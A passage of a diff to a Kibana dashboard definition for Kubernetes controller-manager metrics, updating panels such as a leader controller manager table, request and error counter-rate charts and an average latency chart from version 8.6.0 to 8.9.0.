"shouldTruncate": false - }, - "preferredSeriesType": "area", - "showCurrentTimeMarker": false, - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - 
"valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 3 + }, + "scale": "ordinal", + "sourceField": "kubernetes.controllermanager.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e": { + "dataType": "boolean", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.leader.is_master: *" + }, + "isBucketed": false, + "label": "Last value of kubernetes.controllermanager.leader.is_master", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.leader.is_master" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "11922ebb-686e-4ad0-a043-e425a0d2ce35", + "key": "kubernetes.controllermanager.leader.is_master", + "negate": false, + "params": { + "query": true }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "1604f0de-edd6-456e-8670-ab9b33988abb", - "w": 24, - "x": 0, - "y": 50 - }, - "panelIndex": "1604f0de-edd6-456e-8670-ab9b33988abb", - "title": "CPU usage increase over time", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(249,235,223,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", - "interval": "", - "isModelInvalid": false, - 
"markdown": "HTTP Requests", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true - }, - "title": "", - "type": "metrics", - "uiState": {} + "type": "phrase" + }, + "query": { + "match_phrase": { + "kubernetes.controllermanager.leader.is_master": true } - }, - "gridData": { - "h": 3, - "i": "f8313a9d-ab58-448e-b183-75f914caf53f", - "w": 48, - "x": 0, - "y": 62 - }, - "panelIndex": "f8313a9d-ab58-448e-b183-75f914caf53f", - "title": "", - "type": "visualization", - "version": "8.6.0" + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "center", + "columnId": "469efac9-749a-455e-9864-90dc0f5f954e", + "isTransposed": false, + "width": 256.6666666666667 + }, + { + "columnId": "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e", + "hidden": 
true, + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "52732cce-1342-46e1-8273-82efeffe9aac", + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "37b94d21-2d12-4136-a81d-908d8fc7f78a", + "isTransposed": false, + "width": 345.66666666666663 + } + ], + "headerRowHeight": "auto", + "layerId": "1048fff9-f5a4-446b-8173-e9e22d4b1cff", + "layerType": "data", + "rowHeight": "auto" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-1048fff9-f5a4-446b-8173-e9e22d4b1cff", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Leader controller manager" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 5, + "i": "83449269-d517-4fe6-9266-9d875070d90d", + "w": 24, + "x": 24, + "y": 65 + }, + "panelIndex": "83449269-d517-4fe6-9266-9d875070d90d", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "**NOTE**: The default period to fetch the metrics used in **Requests and responses counter rate** visualization is **10s**. The timestamps from the visualizations were chosen according to that. Otherwise, they might be inaccurate. Adjust them by clicking on the **settings wheel** on the top right of the visualization and go to the **right side menu**. 
After that, write the custom period value on **Horizontal axis > @timestamp > Minimum interval**.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" + } + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "91a7ce56-6a49-4b7e-837f-31c184b48c09", + "w": 24, + "x": 24, + "y": 70 + }, + "panelIndex": "91a7ce56-6a49-4b7e-837f-31c184b48c09", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "692cad49-25ea-40b4-87d2-535b5f35ecd4", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "7c7c4b67-a2df-427f-abbd-635e5fa73a9c": { + "columnOrder": [ + "d3b90051-0bb2-41e0-9d5d-34ff145dba09", + "8a2e9cea-60fb-4603-a072-9b0e6194344c", + "63268365-bb35-456f-831c-78238984a061", + "63268365-bb35-456f-831c-78238984a061X0", + "63268365-bb35-456f-831c-78238984a061X1", + "24a01536-55c3-4c11-b62e-20a2a5435663", + "24a01536-55c3-4c11-b62e-20a2a5435663X1", + "24a01536-55c3-4c11-b62e-20a2a5435663X0", + "1028ba4a-0d68-4d8d-8340-f7a2966f546d", + "1028ba4a-0d68-4d8d-8340-f7a2966f546dX1", + "1028ba4a-0d68-4d8d-8340-f7a2966f546dX0" + ], + "columns": { + "1028ba4a-0d68-4d8d-8340-f7a2966f546d": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.code >= 500" + }, + "isBucketed": false, + "label": "Server errors", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } }, - { - "id": "metrics-*", - "name": "11922ebb-686e-4ad0-a043-e425a0d2ce35", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "1048fff9-f5a4-446b-8173-e9e22d4b1cff": { - 
"columnOrder": [ - "37b94d21-2d12-4136-a81d-908d8fc7f78a", - "52732cce-1342-46e1-8273-82efeffe9aac", - "469efac9-749a-455e-9864-90dc0f5f954e", - "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e" - ], - "columns": { - "37b94d21-2d12-4136-a81d-908d8fc7f78a": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Cluster", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "orchestrator.cluster.name" - }, - "469efac9-749a-455e-9864-90dc0f5f954e": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Host", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "52732cce-1342-46e1-8273-82efeffe9aac": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Leader controller manager name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 3 - }, - "scale": "ordinal", - "sourceField": "kubernetes.controllermanager.name" - }, - "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e": { - "dataType": "boolean", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.leader.is_master: *" - }, - "isBucketed": false, - "label": "Last value of kubernetes.controllermanager.leader.is_master", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": 
"kubernetes.controllermanager.leader.is_master" - } - }, - "incompleteColumns": {} - } - } - } + "formula": "counter_rate(last_value(kubernetes.controllermanager.client.request.count))", + "isFormulaBroken": false + }, + "references": [ + "1028ba4a-0d68-4d8d-8340-f7a2966f546dX1" + ], + "scale": "ratio", + "timeScale": "s" + }, + "1028ba4a-0d68-4d8d-8340-f7a2966f546dX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.code >= 500" + }, + "isBucketed": false, + "label": "Part of Server errors", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.client.request.count" + }, + "1028ba4a-0d68-4d8d-8340-f7a2966f546dX1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.code >= 500" + }, + "isBucketed": false, + "label": "Part of Server errors", + "operationType": "counter_rate", + "references": [ + "1028ba4a-0d68-4d8d-8340-f7a2966f546dX0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "24a01536-55c3-4c11-b62e-20a2a5435663": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.code >= 400 and kubernetes.controllermanager.code < 500" + }, + "isBucketed": false, + "label": "Client errors", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "11922ebb-686e-4ad0-a043-e425a0d2ce35", - "key": "kubernetes.controllermanager.leader.is_master", - "negate": false, - "params": { - "query": true - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "kubernetes.controllermanager.leader.is_master": true - } - } - } - ], - "internalReferences": [], - "query": { - "language": 
"kuery", - "query": "" + "formula": "counter_rate(last_value(kubernetes.controllermanager.client.request.count))", + "isFormulaBroken": false + }, + "references": [ + "24a01536-55c3-4c11-b62e-20a2a5435663X1" + ], + "scale": "ratio", + "timeScale": "s" + }, + "24a01536-55c3-4c11-b62e-20a2a5435663X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.code >= 400 and kubernetes.controllermanager.code < 500" + }, + "isBucketed": false, + "label": "Part of Client errors", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.client.request.count" + }, + "24a01536-55c3-4c11-b62e-20a2a5435663X1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.code >= 400 and kubernetes.controllermanager.code < 500" + }, + "isBucketed": false, + "label": "Part of Client errors", + "operationType": "counter_rate", + "references": [ + "24a01536-55c3-4c11-b62e-20a2a5435663X0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "63268365-bb35-456f-831c-78238984a061": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Requests", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } }, - "visualization": { - "columns": [ - { - "alignment": "center", - "columnId": "469efac9-749a-455e-9864-90dc0f5f954e", - "isTransposed": false, - "width": 256.6666666666667 - }, - { - "columnId": "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e", - "hidden": true, - "isTransposed": false - }, - { - "alignment": "center", - "columnId": "52732cce-1342-46e1-8273-82efeffe9aac", - "isTransposed": false - }, - { - "alignment": "center", - "columnId": "37b94d21-2d12-4136-a81d-908d8fc7f78a", - "isTransposed": false, - "width": 345.66666666666663 - } - ], - "headerRowHeight": "auto", - "layerId": 
"1048fff9-f5a4-446b-8173-e9e22d4b1cff", - "layerType": "data", - "rowHeight": "auto" - } + "formula": "counter_rate(last_value(kubernetes.controllermanager.client.request.count))", + "isFormulaBroken": false + }, + "references": [ + "63268365-bb35-456f-831c-78238984a061X1" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 6, - "i": "fd90adaf-517f-4b92-a5b5-c29f7a16663b", - "w": 24, - "x": 0, - "y": 65 - }, - "panelIndex": "fd90adaf-517f-4b92-a5b5-c29f7a16663b", - "title": "Leader controller manager", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "63268365-bb35-456f-831c-78238984a061X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.client.request.count: *" + }, + "isBucketed": false, + "label": "Part of Requests", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.client.request.count" }, - "description": "", - "id": "", - "params": { - "fontSize": 12, - "markdown": "**NOTE**: The default period to fetch the metrics used in **Requests and responses counter rate** visualization is **10s**. The timestamps from the visualizations were chosen according to that. Otherwise, they might be inaccurate. Adjust them by clicking on the **settings wheel** on the top right of the visualization and go to the **right side menu**. 
After that, write the custom period value on **Horizontal axis \u003e @timestamp \u003e Minimum interval**.", - "openLinksInNewTab": false + "63268365-bb35-456f-831c-78238984a061X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Requests", + "operationType": "counter_rate", + "references": [ + "63268365-bb35-456f-831c-78238984a061X0" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 5, - "i": "83449269-d517-4fe6-9266-9d875070d90d", - "w": 24, - "x": 24, - "y": 65 - }, - "panelIndex": "83449269-d517-4fe6-9266-9d875070d90d", - "type": "visualization", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", - "type": "index-pattern" + "8a2e9cea-60fb-4603-a072-9b0e6194344c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "d3b90051-0bb2-41e0-9d5d-34ff145dba09": { + "dataType": "string", + "isBucketed": true, + "label": "Top values", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "692cad49-25ea-40b4-87d2-535b5f35ecd4", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "7c7c4b67-a2df-427f-abbd-635e5fa73a9c": { - "columnOrder": [ - "d3b90051-0bb2-41e0-9d5d-34ff145dba09", - "8a2e9cea-60fb-4603-a072-9b0e6194344c", - "63268365-bb35-456f-831c-78238984a061", - "63268365-bb35-456f-831c-78238984a061X0", - "63268365-bb35-456f-831c-78238984a061X1", - "24a01536-55c3-4c11-b62e-20a2a5435663", - 
"24a01536-55c3-4c11-b62e-20a2a5435663X1", - "24a01536-55c3-4c11-b62e-20a2a5435663X0", - "1028ba4a-0d68-4d8d-8340-f7a2966f546d", - "1028ba4a-0d68-4d8d-8340-f7a2966f546dX1", - "1028ba4a-0d68-4d8d-8340-f7a2966f546dX0" - ], - "columns": { - "1028ba4a-0d68-4d8d-8340-f7a2966f546d": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.code \u003e= 500" - }, - "isBucketed": false, - "label": "Server errors", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "formula": "counter_rate(last_value(kubernetes.controllermanager.client.request.count))", - "isFormulaBroken": false - }, - "references": [ - "1028ba4a-0d68-4d8d-8340-f7a2966f546dX1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "1028ba4a-0d68-4d8d-8340-f7a2966f546dX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.code \u003e= 500" - }, - "isBucketed": false, - "label": "Part of Server errors", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.client.request.count" - }, - "1028ba4a-0d68-4d8d-8340-f7a2966f546dX1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.code \u003e= 500" - }, - "isBucketed": false, - "label": "Part of Server errors", - "operationType": "counter_rate", - "references": [ - "1028ba4a-0d68-4d8d-8340-f7a2966f546dX0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "24a01536-55c3-4c11-b62e-20a2a5435663": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.code \u003e= 400 and kubernetes.controllermanager.code \u003c 500" - }, - "isBucketed": false, - "label": "Client errors", - "operationType": "formula", - "params": { - "format": 
{ - "id": "number", - "params": { - "decimals": 0 - } - }, - "formula": "counter_rate(last_value(kubernetes.controllermanager.client.request.count))", - "isFormulaBroken": false - }, - "references": [ - "24a01536-55c3-4c11-b62e-20a2a5435663X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "24a01536-55c3-4c11-b62e-20a2a5435663X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.code \u003e= 400 and kubernetes.controllermanager.code \u003c 500" - }, - "isBucketed": false, - "label": "Part of Client errors", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.client.request.count" - }, - "24a01536-55c3-4c11-b62e-20a2a5435663X1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.code \u003e= 400 and kubernetes.controllermanager.code \u003c 500" - }, - "isBucketed": false, - "label": "Part of Client errors", - "operationType": "counter_rate", - "references": [ - "24a01536-55c3-4c11-b62e-20a2a5435663X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "63268365-bb35-456f-831c-78238984a061": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Requests", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "formula": "counter_rate(last_value(kubernetes.controllermanager.client.request.count))", - "isFormulaBroken": false - }, - "references": [ - "63268365-bb35-456f-831c-78238984a061X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "63268365-bb35-456f-831c-78238984a061X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.client.request.count: *" - }, - "isBucketed": false, - "label": "Part of Requests", - "operationType": "last_value", - 
"params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.client.request.count" - }, - "63268365-bb35-456f-831c-78238984a061X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Requests", - "operationType": "counter_rate", - "references": [ - "63268365-bb35-456f-831c-78238984a061X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "8a2e9cea-60fb-4603-a072-9b0e6194344c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "d3b90051-0bb2-41e0-9d5d-34ff145dba09": { - "dataType": "string", - "isBucketed": true, - "label": "Top values", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "kubernetes.controllermanager.method", - "kubernetes.controllermanager.code" - ], - "size": 3 - }, - "scale": "ordinal", - "sourceField": "kubernetes.controllermanager.host" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "692cad49-25ea-40b4-87d2-535b5f35ecd4", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.controllermanager" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.controllermanager" - } - } - } + "secondaryFields": [ + "kubernetes.controllermanager.method", + "kubernetes.controllermanager.code" ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" 
- }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "63268365-bb35-456f-831c-78238984a061", - "24a01536-55c3-4c11-b62e-20a2a5435663", - "1028ba4a-0d68-4d8d-8340-f7a2966f546d" - ], - "layerId": "7c7c4b67-a2df-427f-abbd-635e5fa73a9c", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "d3b90051-0bb2-41e0-9d5d-34ff145dba09", - "xAccessor": "8a2e9cea-60fb-4603-a072-9b0e6194344c" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "size": 3 + }, + "scale": "ordinal", + "sourceField": "kubernetes.controllermanager.host" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "692cad49-25ea-40b4-87d2-535b5f35ecd4", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.controllermanager" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.controllermanager" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "91a7ce56-6a49-4b7e-837f-31c184b48c09", - "w": 24, - "x": 24, - "y": 70 + "layers": [ + { + "accessors": [ + "63268365-bb35-456f-831c-78238984a061", + "24a01536-55c3-4c11-b62e-20a2a5435663", + "1028ba4a-0d68-4d8d-8340-f7a2966f546d" + ], + "layerId": 
"7c7c4b67-a2df-427f-abbd-635e5fa73a9c", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "d3b90051-0bb2-41e0-9d5d-34ff145dba09", + "xAccessor": "8a2e9cea-60fb-4603-a072-9b0e6194344c" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "91a7ce56-6a49-4b7e-837f-31c184b48c09", - "title": "Requests and responses counter rate", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9": { - "columnOrder": [ - "35a11916-4ca3-421b-9df2-521f52f21fbb", - "ed3c7efa-0467-4a57-8d06-0f4775906cc5", - "43097f7a-e478-47bc-81c1-7541bd899d46", - "43097f7a-e478-47bc-81c1-7541bd899d46X0", - "43097f7a-e478-47bc-81c1-7541bd899d46X1", - "43097f7a-e478-47bc-81c1-7541bd899d46X2" - ], - "columns": { - "35a11916-4ca3-421b-9df2-521f52f21fbb": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Host", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "kubernetes.controllermanager.verb" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.controllermanager.host" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": 
"Average latency in ms", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "ms" - } - }, - "formula": "last_value(kubernetes.controllermanager.client.request.duration.us.sum)/last_value(kubernetes.controllermanager.client.request.duration.us.count)/1000", - "isFormulaBroken": false - }, - "references": [ - "43097f7a-e478-47bc-81c1-7541bd899d46X2" - ], - "scale": "ratio" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.client.request.duration.us.sum: *" - }, - "isBucketed": false, - "label": "Part of Average latency in ms", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.client.request.duration.us.sum" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46X1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.client.request.duration.us.count: *" - }, - "isBucketed": false, - "label": "Part of Average latency in ms", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.client.request.duration.us.count" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Average latency in ms", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "43097f7a-e478-47bc-81c1-7541bd899d46X0", - "43097f7a-e478-47bc-81c1-7541bd899d46X1" - ], - "name": "divide", - "type": "function" - }, - 1000 - ], - "location": { - "max": 150, - "min": 0 - }, - "name": "divide", - "text": 
"last_value(kubernetes.controllermanager.client.request.duration.us.sum)/last_value(kubernetes.controllermanager.client.request.duration.us.count)/1000", - "type": "function" - } - }, - "references": [ - "43097f7a-e478-47bc-81c1-7541bd899d46X0", - "43097f7a-e478-47bc-81c1-7541bd899d46X1" - ], - "scale": "ratio" - }, - "ed3c7efa-0467-4a57-8d06-0f4775906cc5": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Requests and responses counter rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "1bd24fa1-319e-4cae-9d45-d821b06a8034", + "w": 24, + "x": 0, + "y": 71 + }, + "panelIndex": "1bd24fa1-319e-4cae-9d45-d821b06a8034", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9": { + "columnOrder": [ + "35a11916-4ca3-421b-9df2-521f52f21fbb", + "ed3c7efa-0467-4a57-8d06-0f4775906cc5", + "43097f7a-e478-47bc-81c1-7541bd899d46", + "43097f7a-e478-47bc-81c1-7541bd899d46X0", + "43097f7a-e478-47bc-81c1-7541bd899d46X1", + "43097f7a-e478-47bc-81c1-7541bd899d46X2" + ], + "columns": { + "35a11916-4ca3-421b-9df2-521f52f21fbb": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + 